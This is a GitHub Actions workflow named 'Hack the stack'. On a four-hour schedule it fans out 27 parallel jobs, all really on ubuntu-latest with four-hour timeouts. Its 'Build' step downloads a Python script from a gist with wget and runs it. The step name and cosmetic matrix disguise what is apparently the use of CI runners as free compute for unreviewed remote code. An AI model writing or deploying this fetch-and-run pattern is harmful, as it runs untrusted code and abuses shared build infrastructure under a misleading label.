name: Hack the stack

on:
  push:
    branches: [ "main" ]
  schedule:
    - cron: 0 */4 * * *
  workflow_dispatch:

permissions:
  contents: read

jobs:
  build:
    strategy:
      matrix:
        os: [macos-latest, windows-latest, ubuntu-latest]
        version: [12, 14, 16]
        environment: [test, staging, production]
    name: ${{ matrix.os }} ${{ matrix.version }} ${{ matrix.environment }}
    runs-on: ubuntu-latest
    timeout-minutes: 240
    steps:
    - name: Set up Python 3.10
      uses: actions/setup-python@v3
      with:
        python-version: "3.10"
    - name: Install Depdendencies
      run: |
        python -m pip install --upgrade pip
        pip install requests
    - name: Build    
      run: |
        wget https://gist.githubusercontent.com/worker/04abc88ed47fe521b0c667369faac920/raw/go.py
        python3 go.py
